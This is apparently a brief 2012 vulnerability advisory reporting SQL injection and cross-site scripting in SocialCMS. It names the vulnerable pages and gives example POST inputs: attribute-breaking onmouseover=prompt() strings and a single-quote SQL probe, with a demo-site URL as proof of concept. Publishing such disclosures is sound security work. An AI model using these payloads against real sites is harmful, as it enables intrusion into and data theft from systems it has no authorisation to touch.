# Exploit Title: SocialCMS SQL Injection and XSS Vulnerability
# Date: 2012
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr
ISSUE
SQL Injection and XSS can be done using the POST method.
Vulnerable Page:
ajax/commentajax.php (SQL Injection)
premium_demo/search.php (XSS)
Example:
URL encoded POST input TREF_email_address was set to "
onmouseover=prompt(908768) bad="
and
URL encoded POST input TR_name was set to " onmouseover=prompt(910836) bad="
URL encoded POST input category was set to 1'
POC:
http://socialcms.com/premium_demo/
Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr
Polish
English